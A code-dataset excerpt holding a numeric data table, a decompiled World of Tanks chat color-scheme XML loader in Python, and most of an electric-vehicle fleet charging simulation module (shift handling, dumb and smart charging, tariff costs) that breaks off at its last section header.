1982 1 0.94266 0.692717 0.876111
1984 1 0.883811 0.691165 0.939776
2016 1 0.871872 0.80527 0.931034
2015 1 0.936095 0.757894 0.936308
2013 1 0.87302 0.754588 0.8684
2014 1 0.938512 0.818933 0.868913
2017 1 0.0104741 0.872219 0.875095
2018 1 0.0641637 0.940272 0.879881
2021 1 0.122058 0.875625 0.876234
2024 1 0.121978 0.943024 0.939036
2020 1 0.0130986 0.93323 0.942253
2019 1 0.0689774 0.870519 0.94127
1122 1 0.0692996 0.941594 0.993751
905 1 0.243662 0.997242 0.87654
907 1 0.312456 0.989022 0.93389
2023 1 0.181154 0.877381 0.936318
2028 1 0.240474 0.938732 0.947242
2025 1 0.250772 0.869018 0.872725
2022 1 0.184045 0.938206 0.881224
2027 1 0.305709 0.884342 0.939571
2026 1 0.298802 0.93523 0.873704
1129 1 0.243674 0.871934 0.998796
9 1 0.257176 0.998053 0.998817
17 1 0.49963 0.993594 0.996769
2036 1 0.497658 0.935594 0.932123
2031 1 0.433783 0.873561 0.937563
2032 1 0.371095 0.927622 0.93481
2030 1 0.434524 0.944204 0.880385
1133 1 0.373849 0.877495 0.99641
2033 1 0.495125 0.873016 0.877088
2029 1 0.36751 0.871011 0.877305
13 1 0.376928 0.996454 0.991166
1134 1 0.438165 0.934005 0.99125
2035 1 0.561437 0.866497 0.934565
2034 1 0.556522 0.938878 0.877989
2040 1 0.620703 0.93928 0.93445
2037 1 0.627134 0.869473 0.868351
1138 1 0.560755 0.930604 0.993915
917 1 0.629312 0.998096 0.871117
1146 1 0.812314 0.944641 0.994347
2038 1 0.681985 0.934376 0.865693
921 1 0.749994 0.996311 0.874173
2042 1 0.815743 0.936553 0.872318
2044 1 0.751111 0.936747 0.93767
2043 1 0.8185 0.876889 0.938709
1142 1 0.685408 0.940446 0.996802
2041 1 0.747362 0.878802 0.874908
2039 1 0.679463 0.878265 0.9325
919 1 0.683039 0.996018 0.933229
1145 1 0.759272 0.877068 0.998892
25 1 0.741738 0.995281 0.994121
1149 1 0.882261 0.883536 0.997016
927 1 0.942771 0.995405 0.940353
2045 1 0.875798 0.875155 0.866489
2046 1 0.940973 0.942026 0.873173
2047 1 0.934804 0.876119 0.931346
2048 1 0.879052 0.944519 0.934353
1121 1 0.992805 0.873387 0.996621
1150 1 0.943477 0.935311 0.993898
29 1 0.88387 0.98976 0.999217
| [
"[email protected]"
] | |
2372a02f129a67fbf7970e593aecdaeb2bdb38b5 | 55647a80c8b412af9df0ba3f50595cc2f29c25e6 | /res/scripts/client/messenger/doc_loaders/colors_schemes.py | 5d932c37ceee7ccf7724d9394a83e08eff0f0204 | [] | no_license | cnsuhao/WOT-0.9.17-CT | 0035eb6070fb4fab8d8ee9f8bbc676c10d511cfb | d1f932d8cabaf8aa21708622e87f83c8d24d6451 | refs/heads/master | 2021-06-08T18:11:07.039293 | 2016-11-19T19:12:37 | 2016-11-19T19:12:37 | null | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 2,484 | py | # 2016.11.19 19:53:40 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/messenger/doc_loaders/colors_schemes.py
from messenger.doc_loaders import _xml_helpers
def _readColors(xmlCtx, section, colorsNames, defName):
result = {}
notFound = colorsNames[:]
for tagName, subSec in section.items():
if tagName != 'color':
raise _xml_helpers.XMLError(xmlCtx, 'Tag "{0:>s}" is invalid'.format(tagName))
ctx = xmlCtx.next(subSec)
name = _xml_helpers.readNoEmptyStr(ctx, subSec, 'name', 'Section "name" is not defined')
if name not in colorsNames:
raise _xml_helpers.XMLError(ctx, 'Name of color {0:>s} is invalid'.format(name))
result[name] = _xml_helpers.readRGB(ctx, subSec, 'rgb', 'Color is invalid.')
notFound.remove(name)
if len(notFound):
defColor = 0
if defName in result:
defColor = result[defName]
for name in notFound:
result[name] = defColor
return result
def _readColorScheme(xmlCtx, section, colorScheme):
names = colorScheme.getColorsNames()
defName = colorScheme.getDefColorName()
for tagName, subSec in section.items():
if tagName == 'name':
continue
if tagName != 'item':
raise _xml_helpers.XMLError(xmlCtx, 'Tag "{0:>s}" is invalid'.format(tagName))
ctx = xmlCtx.next(subSec)
name = _xml_helpers.readNoEmptyStr(ctx, subSec, 'name', 'Section "name" is not defined')
colorsSec = subSec['colors']
if not colorsSec:
raise _xml_helpers.XMLError(ctx, 'Section "colors" is not defined')
colorScheme[name] = _readColors(ctx.next(colorsSec), colorsSec, names, defName)
def load(xmlCtx, section, messengerSettings):
for tagName, subSec in section.items():
if tagName != 'colorScheme':
raise _xml_helpers.XMLError(xmlCtx, 'Tag {0:>s} is invalid'.format(tagName))
ctx = xmlCtx.next(subSec)
name = _xml_helpers.readNoEmptyStr(ctx, subSec, 'name', 'Color scheme name is not defined')
colorScheme = messengerSettings.getColorScheme(name)
if colorScheme is not None:
_readColorScheme(ctx, subSec, colorScheme)
return
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\messenger\doc_loaders\colors_schemes.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.11.19 19:53:40 Střední Evropa (běžný čas)
| [
"[email protected]"
] | |
b0059167390bda100df2b9fb1dfdfd3c359fe18c | 4b2f0dae781d91baec5b94055e23720838c0feda | /Fleet Simulation/archive/simFunctionsVer8.py | 8b6810e2f51188af4585a31306f5e394dbfc12ca | [] | no_license | tiff413/EV-Technology-2019 | ec88eb411a3ce5f39387b682cd853da86e364ec3 | 7fe8a3bda28a5ac9b6d0b29fa27621e9ceca4fe5 | refs/heads/master | 2021-01-03T22:28:16.873563 | 2020-03-13T11:01:46 | 2020-03-13T11:01:46 | 240,260,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41,093 | py | import pandas as pd
import numpy as np
import datetime as dt
import time
# CHOOSE NUMBER OF CHUNKS IN AN HOUR
# e.g. 3 chunks would divide the hour into 20-min shifts
chunks = 2
##############################
# TIME FUNCTIONS
##############################
# CONVERTS TIME INTO DATETIME
def readTime(ti):
if len(ti) == 5: read = (dt.datetime.strptime(ti, "%H:%M")).time()
elif len(ti) == 8: read = (dt.datetime.strptime(ti, "%H:%M:%S")).time()
elif len(ti) == 10: read = (dt.datetime.strptime(ti, "%Y-%m-%d")).date()
else: read = dt.datetime.strptime(ti, "%Y-%m-%d %H:%M:%S")
return read
# READS IN A DATETIME AND REFORMATS IT
def rereadTime(ti):
reread = str(ti)
read = dt.datetime.strptime(reread, "%Y-%m-%d %H:%M:%S")
return read
# INCREMENTS TIME BY THE HOUR TO EXECUTE SIMULATION
def incrementTime(ti):
return (rereadTime(ti) + dt.timedelta(hours=1/chunks))
##############################
# MISC FUNCTIONS
##############################
# SELECT FLEET DATA IN EXECUTION FILE BASED ON:
# number of cars
# battery size
# number of fast charge points
def selectCase(df, params):
for key in params: df = df.loc[df[key] == params[key]]
return df
# RETRIEVES COLUMN DATA FROM DATAFRAME
def getData(df, col):
return df[col].values[0]
# GENERATE CAR DATA AND CHARGE POINT DATA
def getLists(df):
# initialise charge points data
slow_cps = getData(df, 'slowChargePts')
fast_cps = getData(df, 'fastChargePts')
rapid_cps = getData(df, 'rapidChargePts')
chargePts = slow_cps + fast_cps + rapid_cps
chargePt_data = ([[22,1]]*rapid_cps + [[7,1]]*fast_cps + [[3,1]]*slow_cps)
# initialise car data
smallCars = getData(df, 'smallCars')
mediumCars = getData(df, 'mediumCars')
largeCars = getData(df, 'largeCars')
car_data = [[30, 1, 30, np.nan, -1, np.nan, np.nan]]*smallCars + [[40, 1, 40, np.nan, -1, np.nan, np.nan]]*mediumCars + [[70, 1, 70, np.nan, -1, np.nan,np.nan]]*largeCars
# assign available charge points to cars
for cp_id in range(chargePts):
size = car_data[cp_id][0]
car_data[cp_id] = [size,1,size,cp_id,-1,np.nan,np.nan]
return car_data, chargePt_data
# ORGANISE DATAFRAME FOR VIEWING
def dfFunction(df, col):
DF = df.set_index(['time','totalCost',col])
DF = DF.T.stack().T
return DF
######################################
# FOR COLOURING CELLS IN SIMULATION DF
######################################
def crColour(val):
if val > 0: color = 'green'
elif val == 0: color = 'green'
else: color = 'red'
return 'color: %s' % color
def crBackground(val):
if val > 0: color = '#adfc83'
elif val == 0: color = '#daed0c'
else: color = '#fab9b9'
return 'background-color: %s' % color
def eventBackground(val):
if val == 'full': color = '#00b200'
elif val == 'charge': color = '#adfc83'
elif val == 'drive': color = '#fab9b9'
elif val == 'wait': color = '#daed0c'
elif val == 'RC': color = 'red'
else: color = None
return 'background-color: %s' % color
def styleDF(df):
DF = df.style.\
applymap(crColour, subset=['chargeDiff']).\
applymap(crBackground, subset=['chargeDiff']).\
applymap(eventBackground, subset=['event'])
return DF
################################################################
# UNPACK SHIFT DATA FROM DATA FRAME INTO LIBRARY (SHIFTS BY CAR)
################################################################
def unpackShifts(carData, allShiftsDF):
# INITIALISE LIBRARY
shiftsByCar = {}
# FOR ALL CARS:
for cars in range(0, len(carData)):
# SELECT DATA FOR CAR
shiftsDFcar = allShiftsDF.loc[allShiftsDF['car']==cars]
# CREATE NEW DATAFRAME FOR UNPACKED SHIFTS
shiftsDF = pd.DataFrame(columns=["startShift","endShift"])
# FOR EVERY DAY, UNPACK SHIFTS INTO DATA FRAME:
for day in range(len(shiftsDFcar)):
# READ IN THE DATE AS A STRING AND LIST OF SHIFTS
dayStr = str(shiftsDFcar.loc[(shiftsDFcar.index[day]), 'day'])
shiftsLi = eval(shiftsDFcar.loc[(shiftsDFcar.index[day]), 'shift'])
# ***** UNPACK AND REFORMAT SHIFTS INTO NEW DATAFRAME *****
# FOR EVERY SHIFT:
for shift in range(0, len(shiftsLi)):
# SPLIT SHIFT INTO START SHIFT AND END SHIFT
splitShift = shiftsLi[shift].split("-")
# IF START SHIFT < END SHIFT, ASSUME SHIFT DOESN'T RUN OVERNIGHT
if readTime(splitShift[0]) < readTime(splitShift[1]):
# FORMAT DATE AND TIME TO START AND END SHIFT
startS = dayStr + " " + splitShift[0]
endS = dayStr + " " + splitShift[1]
# IF START SHIFT > END SHIFT, ASSUME SHIFT RUNS OVERNIGHT
else:
# FOR START SHIFT, FORMAT USING CURRENT DATE
startS = dayStr + " " + splitShift[0]
# FOR END SHIFT, FORMAT USING DATE OF THE NEXT DAY
nextDay = readTime(dayStr) + dt.timedelta(days=1)
endS = str(nextDay) + " " + splitShift[1]
# APPEND START AND END SHIFT AS A ROW IN SHIFTS DF
newRow = {"startShift" : startS,
"endShift" : endS}
shiftsDF = shiftsDF.append(newRow, ignore_index=True)
# SORT SHIFTS DF AND ASSIGN TO LIBRARY
shiftsDF = shiftsDF.sort_values(by=['startShift'])
shiftsDF = shiftsDF.reset_index(drop=True)
shiftsByCar['%s' % cars] = shiftsDF
return shiftsByCar
##############################################
# IMPLEMENT CHANGES AT START AND END OF SHIFTS
##############################################
# WHEN SHIFT STARTS:
# Remove from depot
# Let inDepot = 0 in carDataDF
# If connected to chargePt, remove chargePt
# WHEN SHIFT ENDS:
# Enter depot
# Let inDepot = 1 in carDataDF
def inOutDepot(carDataDF, shiftsByCar, time, depot, chargePtDF, toChargeDF, eventChange):
# FOR EVERY CAR:
for car in range(0, len(carDataDF)):
# ***** CHECK IF CAR IS AT THE END OF A SHIFT *****
# IF TIME == END TIME OF CURRENT SHIFT:
if str(time) == carDataDF.loc[car, 'latestEndShift']:
# ENTER DEPOT
carDataDF.loc[car,'inDepot'] = 1
depot.append(car)
# RECOGNISE AN EVENT HAS HAPPENED
eventChange = True
# ***** CHECK IF CAR IS AT THE START OF A SHIFT *****
# READ INDEX OF CURRENT SHIFT AND LENGTH OF SHIFTS BY CAR
shiftIndex = carDataDF.loc[car, 'shiftIndex']
lastShiftIndex = len(shiftsByCar[str(car)])
# IF NEXT SHIFT EXISTS:
if (shiftIndex + 1) < lastShiftIndex:
# READ START TIME AND END TIME OF THE NEXT SHIFT
nextStartShift = shiftsByCar[str(car)].loc[shiftIndex+1, 'startShift']
nextEndShift = shiftsByCar[str(car)].loc[shiftIndex+1, 'endShift']
# IF TIME == START TIME OF THE NEXT SHIFT:
if str(time) == nextStartShift:
# EXIT DEPOT
carDataDF.loc[car,'inDepot'] = 0
depot.remove(car)
# REMOVE CHARGE PT IN CHARGE PT DF
pt = carDataDF.loc[car,'chargePt']
if not np.isnan(pt):
chargePtDF.loc[pt,'inUse'] = np.nan
# print("remove charge point "+str(pt))
# REMOVE CHARGE PT IN CAR DATA DF
carDataDF.loc[car,'chargePt'] = np.nan
# LET CHARGE RATE = 0 IN TO-CHARGE DF
toChargeDF.loc[car,'chargeRate'] = 0
# UPDATE SHIFT DATA IN CAR DATA DF
carDataDF.loc[car, 'shiftIndex'] = shiftIndex + 1
carDataDF.loc[car, 'latestStartShift'] = nextStartShift
carDataDF.loc[car, 'latestEndShift'] = nextEndShift
# RECOGNISE AN EVENT HAS HAPPENED
eventChange = True
return carDataDF, depot, chargePtDF, toChargeDF, eventChange
################################################
# READ CARS WITH FULL BATTERY INTO SIMULATION DF
################################################
def readFullBattCars(carDataDF, simulationDF, toChargeDF, time, totalCost, eventChange):
# SELECT VEHICLES IN THE DEPOT WITH FULL BATTERY
chargeDF = carDataDF.loc[carDataDF['inDepot'] == 1]
fullBattDF = chargeDF.loc[chargeDF['battkW'] == chargeDF['battSize']]
# IF CAR IS FULLY CHARGED, LET CHARGE RATE = 0 IN TO-CHARGE DF
for row in range(len(fullBattDF)):
car = fullBattDF.index[row]
toChargeDF.loc[car, 'chargeRate'] = 0
# ***** IF NEW CARS REACH FULL BATT, RECOGNISE EVENT *****
# CREATE A SET FOR CARS THAT HAD FULL BATT IN PREVIOUS TIME
prevSimData = simulationDF.iloc[-len(carDataDF):]
prevFullBatt = prevSimData.loc[prevSimData['event']=="full"]
prevFullBattCars = set(prevFullBatt['car'].values.tolist())
# CREATE A SET FOR CARS THAT CURRENTLY HAVE FULL BATT
fullBattCars = set(fullBattDF.index.tolist())
# IF NO. OF FULL BATT CARS >= PREVIOUS NO. OF FULL BATT CARS:
if len(fullBattCars) >= len(prevFullBattCars):
# AND IF INDEX OF FULL BATT CARS ARE DIFFERENT FROM PREVIOUS FULL BATT CARS:
if fullBattCars != prevFullBattCars:
# RECOGNISE AN EVENT HAS HAPPENED
eventChange = True
return toChargeDF, eventChange
################################################
# READ TARIFF CHANGES
################################################
def readTariffChanges(time, pricesDF, company, eventChange):
# READ IN START AND END TIMES OF GREEN ZONE
greenStart = pricesDF.loc[pricesDF['company']==company, 'startGreenZone'].to_string(index=False)
greenEnd = pricesDF.loc[pricesDF['company']==company, 'endGreenZone'].to_string(index=False)
# READ IN TIME WITHOUT DATE
timeHr = readTime(str(time.time()))
# TIME == START OR END OF GREEN ZONE, THERE IS A TARIFF CHANGE
if timeHr == readTime(greenStart) or timeHr == readTime(greenEnd):
# RECOGNISE AN EVENT HAS HAPPENED
eventChange = True
return eventChange
###############################
# LOOK AT CARS OUTSIDE THE DEPOT
# FOR CARS THAT NEED RAPID CHARGING: RAPID CHARGE
# FOR CARS THAT DON'T NEED RAPID CHARGING: DECREASE BATT
###############################
def driving(carDataDF, time, rcCount, RCduration, RCperc, simulationDF, driveDataByCar, ind, totalCost):
# FIND CARS OUTSIDE OF DEPOT
drivingCarsDF = carDataDF.loc[carDataDF["inDepot"]==0]
# ***** DIVIDE CARS THAT NEED RAPID CHARGING AND CARS THAT DONT INTO 2 LISTS *****
# FIND CARS TO RAPID CHARGE AND APPEND TO LIST
toRapidCharge = []
# IF NO NEED TO RAPID CHARGE, APPEND TO ANOTHER LIST
dontRapidCharge = []
# FOR CARS OUTSIDE OF DEPOT:
# * CHECK FOR CARS CURRENTLY RAPID CHARGING
# * THEN CHECK FOR CARS THAT NEED RAPID CHARGING
for row in range(len(drivingCarsDF)):
car = drivingCarsDF.index[row]
# FIND DURATION OF RAPID CHARGE IN CHUNKS
RCchunks = np.ceil(chunks/(60/RCduration))
# PREPARE BASE CASE FOR WHILE LOOP
chunkCount = 1
checkTime = str(time - ((dt.timedelta(hours=1/chunks))*chunkCount))
prevSimChunk = simulationDF.loc[simulationDF['time']==checkTime]
checkEvent = prevSimChunk.loc[prevSimChunk['car']==car, 'event'].to_string(index=False)
# CHECK IF CAR HAS BEEN RAPID CHARGING
while checkEvent == "RC":
chunkCount += 1
checkTime = str(time - ((dt.timedelta(hours=1/chunks))*chunkCount))
prevSimChunk = simulationDF.loc[simulationDF['time']==checkTime]
checkEvent = prevSimChunk.loc[prevSimChunk['car']==car, 'event'].to_string(index=False)
# IF CAR IS RAPID CHARGING AND REQUIRES MORE RAPID CHARGING:
if 1 < chunkCount <= RCchunks:
# APPEND TO RAPID CHARGE LIST
toRapidCharge.append(car)
# ELSE (CAR HAS NOT BEEN RAPID CHARGING), CHECK IF CAR NEEDS RAPID CHARGING
else:
# IF BATTERY < RC PERCENTAGE (INPUT), CAR NEEDS RAPID CHARGING
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
if batt < (battSize*(RCperc/100)):
# APPEND TO RAPID CHARGE LIST
toRapidCharge.append(car)
# INCREASE RAPID CHARGE COUNT
rcCount += 1
# OTHERWISE, ADD TO DON'T RAPID CHARGE LIST
else: dontRapidCharge.append(car)
# ***** FOR CARS THAT DON'T NEED RAPID CHARGING, DECREASE BATT (DRIVE) *****
for carsDontRC in range(len(dontRapidCharge)):
car = dontRapidCharge[carsDontRC]
# READ BATTERY
batt = carDataDF.loc[car, 'battkW']
# GET RANDOMISED VALUE FOR MILEAGE AND MPKW
mileage = driveDataByCar[str(car)].loc[ind, 'mileage']
mpkw = driveDataByCar[str(car)].loc[ind, 'mpkw']
# CALCULATE RATE OF BATT DECREASE
kwphr = mileage/mpkw
# UPDATE SIMULATION ACCORDINGLY
simulationDF = simulationDF.append({
'time': time,
'car': car,
'chargeDiff': round(-kwphr/chunks, 1),
'batt': round(batt, 1),
'event': 'drive',
'costPerCharge': 0,
'totalCost': round(totalCost, 2)
}, ignore_index=True)
# DECREASE BATTERY
batt -= kwphr/chunks
# ASSIGN BATTERY
carDataDF.loc[car,'battkW'] = batt
# ***** FOR CARS THAT NEED RAPID CHARGING, RAPID CHARGE *****
for carsToRC in range(len(toRapidCharge)):
car = toRapidCharge[carsToRC]
# READ BATTERY AND BATTERY SIZE
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
# CALCULATE BATTERY INCREASE
RCbattIncrease = 50/chunks
# UPDATE RAPID CHARGE COUNT AND TOTAL COST
RCcost = 0.3*(50/chunks)
totalCost += RCcost
# UPDATE SIMULATION ACCORDINGLY
simulationDF = simulationDF.append({
'time': time,
'car': car,
'chargeDiff': round(RCbattIncrease, 1),
'batt': round(batt, 1),
'event': 'RC',
'costPerCharge': RCcost,
'totalCost': round(totalCost, 2)
}, ignore_index=True)
# RAPID CHARGE
batt += RCbattIncrease
if batt > battSize: batt = battSize
# ASSIGN BATTERY
carDataDF.loc[car,'battkW'] = batt
return carDataDF, rcCount, simulationDF, totalCost
#############################################################
# ALLOCATE AN AVAILABLE CHARGE PT OR SELECT CURRENT CHARGE PT
#############################################################
def findChargePt(carDataDF, car, chargePtDF):
# SELECT AVAILABLE CHARGE PTS
availablePts = chargePtDF.loc[chargePtDF['inUse'] != 1]
chargePt = carDataDF.loc[car, 'chargePt']
# IF CAR IS NOT ON A CHARGE PT, PLUG INTO FIRST AVAILABLE CHARGE PT
if np.isnan(chargePt) and len(availablePts) > 0:
pt = availablePts.index[0]
# print("car "+str(car)+" plugged into CP "+str(pt))
availablePts = availablePts.drop(pt, axis=0)
# UPDATE CHARGE PT DF and CAR DATA DF
chargePtDF.loc[pt, 'inUse'] = 1
carDataDF.loc[car, 'chargePt'] = pt
# IF CAR HAS A CHARGE PT, PT = CHARGE PT, ELSE PT = NAN
else:
pt = chargePt
# print("car "+str(car)+" has charge pt "+str(pt))
return pt, carDataDF, chargePtDF
###################################
# CHARGE VEHICLE FOR ONE HOUR
###################################
def charge(carDataDF, depot, simulationDF, time, chargePtDF, toChargeDF, pricesDF, company, totalCost):
# FOR EVERY CAR IN THE DEPOT
for index in range(len(depot)):
car = depot[index]
# READ IN BATTERY, BATTERY SIZE AND CHARGE RATE
batt = carDataDF.loc[car,'battkW']
battSize = carDataDF.loc[car,'battSize']
chargeRate = toChargeDF.loc[car,'chargeRate']
# FIND PRICE OF CHARGE AT TIME
# * Read in start and end times of green zone
greenStart = pricesDF.loc[pricesDF['company']==company, 'startGreenZone'].to_string(index=False)
greenEnd = pricesDF.loc[pricesDF['company']==company, 'endGreenZone'].to_string(index=False)
# * Read in time without date
timeHr = readTime(str(time.time()))
# IF TIME IS WITHIN GREEN ZONE, PRICE = GREEN ZONE PRICE
if readTime(greenStart) <= timeHr < readTime(greenEnd):
price = float(pricesDF.loc[pricesDF['company']==company, 'priceGreenZone'])
# ELSE, PRICE = RED ZONE PRICE
else:
price = float(pricesDF.loc[pricesDF['company']==company, 'priceRedZone'])
# CALCULATE COST OF CHARGE AND ADD THIS TO TOTAL COST
costOfCharge = (chargeRate*price)/chunks
totalCost += costOfCharge
# DETERMINE EVENT STATUS
if chargeRate > 0:
event = "charge"
else:
if batt == battSize: event = "full"
else: event = "wait"
# APPEND DATA TO SIMULATION DATA
simulationDF = simulationDF.append({
'time': time,
'car': car,
'chargeDiff': round(chargeRate/chunks, 1),
'batt': round(batt, 1),
'event': event,
'costPerCharge': round(costOfCharge, 1) if chargeRate > 0 else 0,
'totalCost': round(totalCost, 2)
}, ignore_index=True)
# print("CHARGE")
# INCREASE BATTERY PERCENTAGE ACCORDING TO CHARGE RATE
batt += chargeRate/chunks
batt = battSize if batt >= battSize else batt
# ASSIGN BATTERY
carDataDF.loc[car, 'battkW'] = batt
return carDataDF, simulationDF, chargePtDF, totalCost
############################################
# CHOOSE MAX TOTAL COST OF THE ROW idk how to explain
############################################
def adjustTotalCost(time, simulationDF):
# SELECT ROWS IN SIMULATION WHERE TIME == TIME
selectRows = simulationDF.loc[simulationDF['time']==time]
# SELECT THE MAXIMUM VALUE IN THE TOTAL COST COLUMN
maxCost = selectRows['totalCost'].max()
# REPLACE EVERY OTHER TOTAL COST VALUE WITH MAXIMUM VALUE FOR THIS TIME
simulationDF.loc[simulationDF['time']==time, 'totalCost'] = maxCost
return simulationDF
#################################################################################################################################
# CORE FUNCTIONS
#################################
# INCREASE BATT DURING CHARGE
#################################
def dumbCharge(carDataDF, depot, shiftsByCar, time,
availablePower, simulationDF, chargePtDF, toChargeDF,
pricesDF, company, totalCost):
# SELECT CARS IN DEPOT THAT ARE NOT FULLY CHARGED
needChargeDF = carDataDF.loc[(carDataDF['inDepot'] == 1) &
(carDataDF['battkW'] < carDataDF['battSize'])]
# FOR CARS IN DEPOT:
for cars in range(len(needChargeDF)):
car = needChargeDF.index[cars]
# ALLOCATE AVAILABLE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
# SELECT CARS IN DEPOT WITH VALID CHARGE PTS
chargeDF = carDataDF.loc[(carDataDF['inDepot'] == 1) &
(carDataDF['battkW'] < carDataDF['battSize']) &
(~carDataDF['chargePt'].isna())]
# IF THERE ARE CARS WITH VALID CHARGE POINTS THAT REQUIRE CHARGING
if len(chargeDF) > 0:
# SPLIT CHARGE RATE EQUALLY BETWEEN CARS THAT ARE CHARGING
if len(chargeDF) <= len(chargePtDF): splitChargeRate = availablePower/len(chargeDF)
else: splitChargeRate = availablePower/len(chargePtDF)
# CHARGE SELECTED CARS IN DEPOT
for cars in range(len(chargeDF)):
car = chargeDF.index[cars]
# LET CHARGE RATE = SPLIT CHARGE RATE
chargeRate = splitChargeRate
# ALLOCATE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
# IF CAR HAS A VALID CHARGE PT
if not np.isnan(pt):
# LIMIT CHARGE RATE TO MAX RATE OF CHARGE PT
maxRatePt = chargePtDF.loc[pt, 'maxRate']
if maxRatePt < chargeRate: chargeRate = maxRatePt
# IF NO CHARGE PTS AVAILABLE, DON'T CHARGE
else: chargeRate = 0
# UPDATE TO-CHARGE DF
toChargeDF.loc[car, 'chargeRate'] = chargeRate
# FOR CARS IN DEPOT THAT ARE FULLY CHARGED
return carDataDF, chargePtDF, toChargeDF, totalCost
#########################################
# INCREASE BATT DURING CHARGE (LEAVETIME)
#########################################
def smartCharge_leavetime(carDataDF, depot, shiftsByCar, time,
availablePower, simulationDF, chargePtDF, toChargeDF,
pricesDF, company, totalCost):
# IF THERE ARE CARS IN THE DEPOT
if len(depot) > 0:
# CREATE A LIST FOR CARS AND THEIR LEAVETIMES (TIME UNTIL CAR LEAVES DEPOT)
leaveTList = []
# # ***** FIND LEAVETIMES AND APPEND TO A LIST *****
for cars in range(0, len(depot)):
car = depot[cars]
# READ INDEX OF LATEST SHIFT AND INDEX OF THE LAST SHIFT
shiftIndex = carDataDF.loc[car, 'shiftIndex']
lastShiftIndex = len(shiftsByCar[str(car)])
# IF NEXT SHIFT EXISTS, TAKE START TIME OF NEXT SHIFT
if (shiftIndex + 1) < lastShiftIndex:
nextStart = shiftsByCar[str(car)].loc[shiftIndex+1, 'startShift']
# IF SHIFT INDEX GOES BEYOND LAST SHIFT, TAKE ARBITRARY LEAVETIME BEYOND RUN TIME
else:
lastStart = shiftsByCar[str(car)].loc[lastShiftIndex-1, 'startShift']
lastDay = readTime(lastStart).date() + dt.timedelta(days=1)
nextStart = readTime(str(lastDay) + " 23:59:59")
# CALCULATE TIME LEFT UNTIL CAR LEAVES AND APPEND TO LIST
hrsLeft = ((rereadTime(nextStart) - rereadTime(time)).total_seconds())/(60*60)
leaveTList.append([car, hrsLeft])
# ***** CONVERT LIST INTO DATAFRAME AND SORT *****
leaveTimes = pd.DataFrame.from_records(leaveTList, columns=['car','hrsLeft'])
leaveTimes = leaveTimes.sort_values(by=['hrsLeft'])
leaveTimes = leaveTimes.reset_index(drop=True)
# ***** CHARGE CARS IN SORTED ORDER *****
for row in range(0, len(leaveTimes)):
# READ IN DATA FOR SELECTED CAR
car = leaveTimes.loc[row, 'car']
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
chargePt = carDataDF.loc[car, 'chargePt']
# IF CAR BATT IS NOT 100%, CHARGE CAR
if batt < battSize:
# ALLOCATE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
chargeRate = 0
# IF CAR HAS A VALID CHARGE PT:
if not np.isnan(pt):
# READ MAX RATE
maxRate = chargePtDF.loc[pt, 'maxRate']
# CALCULATE THE ENERGY LEFT IF CAR WAS CHARGED AT MAX
energyLeft = availablePower - maxRate
# IF THERE IS ENOUGH ENERGY FOR MAX RATE, CHARGE CAR AT MAX
if energyLeft >= 0:
chargeRate = maxRate
# IF THERE ISN'T ENOUGH FOR MAX RATE, CHARGE USING REMAINING POWER
elif energyLeft < 0 and energyLeft > -maxRate:
chargeRate = availablePower
# IF VEHICLE IS PLUGGED IN BUT NOT ALLOCATED CHARGE
else:
chargeRate = 0
# ADJUST TO-CHARGE DF WITH CHARGE RATE
toChargeDF.loc[car, 'chargeRate'] = chargeRate
# ADJUST AVAILABLE POWER
availablePower -= chargeRate
return carDataDF, chargePtDF, toChargeDF, totalCost
######################################
# INCREASE BATT DURING CHARGE (BATT)
######################################
def smartCharge_batt(carDataDF, depot, shiftsByCar, time,
availablePower, simulationDF, chargePtDF, toChargeDF,
pricesDF, company, totalCost):
# IF THERE ARE CARS IN THE DEPOT
if len(depot) >= 1:
# CREATE A LIST FOR CARS AND THEIR BATT NEEDED
battNeededList = []
# ***** FOR ALL CARS, FIND BATT NEEEDED UNTIL FULLY CHARGED *****
for cars in range(0, len(depot)):
carNum = depot[cars]
# CALCULATE BATTERY NEEDED AND APPEND TO LIST
battLeft = abs(carDataDF.loc[carNum,'battSize']-carDataDF.loc[carNum,'battkW'])
battNeededList.append([carNum, battLeft])
# ***** CONVERT LIST INTO DATAFRAME AND SORT *****
battNeeded = pd.DataFrame.from_records(battNeededList, columns=['car','battLeft'])
battNeeded = battNeeded.sort_values(by=['battLeft'], ascending=False)
battNeeded = battNeeded.reset_index(drop=True)
# ***** CHARGE CARS IN SORTED ORDER *****
for row in range(0, len(battNeeded)):
# READ IN DATA FOR SELECTED CAR
car = battNeeded.loc[row, 'car']
batt = carDataDF.loc[car, 'battkW']
battSize = carDataDF.loc[car, 'battSize']
chargePt = carDataDF.loc[car, 'chargePt']
# IF CAR BATT IS NOT 100%, CHARGE CAR
if batt < battSize:
# ALLOCATE CHARGE PT IF CAR DOESN'T HAVE ONE
pt, carDataDF, chargePtDF = findChargePt(carDataDF, car, chargePtDF)
chargeRate = 0
# IF CAR HAS A VALID CHARGE PT
if not np.isnan(pt):
# READ MAX RATE
maxRate = chargePtDF.loc[pt, 'maxRate']
# CALCULATE THE ENERGY LEFT IF CAR WAS CHARGED AT MAX
energyLeft = availablePower - maxRate
# IF THERE IS ENOUGH ENERGY FOR MAX RATE, CHARGE CAR AT MAX
if energyLeft >= 0:
chargeRate = maxRate
# IF THERE ISN'T ENOUGH FOR MAX RATE, CHARGE USING REMAINING POWER
elif energyLeft < 0 and energyLeft > -maxRate:
chargeRate = availablePower
# IF VEHICLE IS PLUGGED IN BUT NOT ALLOCATED CHARGE
else:
chargeRate = 0
# ADJUST TO-CHARGE DF WITH CHARGE RATE
toChargeDF.loc[car, 'chargeRate'] = chargeRate
# ADJUST AVAILABLE POWER
availablePower -= chargeRate
return carDataDF, chargePtDF, toChargeDF, totalCost
###########################################
# INCREASE BATT DURING CHARGE (SUPER SMART)
###########################################
